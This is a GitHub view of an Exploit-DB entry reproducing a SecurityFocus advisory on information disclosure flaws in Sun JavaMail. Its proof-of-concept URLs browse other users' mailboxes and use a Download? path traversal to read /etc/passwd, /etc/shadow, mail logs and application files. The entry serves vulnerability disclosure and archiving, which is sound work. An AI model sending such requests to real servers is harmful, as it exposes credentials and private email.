forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path25702.txt
More file actions
executable file
·26 lines (20 loc) · 1.32 KB
/
Copy path25702.txt
File metadata and controls
executable file
·26 lines (20 loc) · 1.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
source: http://www.securityfocus.com/bid/13753/info
Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The following issues are reported:
A remote attacker may reveal the contents of email attachments of other users.
A remote attacker may download and peruse arbitrary files with the privileges of the affected service.
A remote attacker may exploit these issues to disclose potentially sensitive information that could be used to aid in further attacks.
First issue:
http://example.com/mailboxesdir/user2@example.com/
http://example.com/mailboxesdir/user3@example.com/
Second issue:
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp
http://example.com/Download?/etc/passwd
http://example.com/Download?/etc/shadow
http://example.com/Download?/etc/group
http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog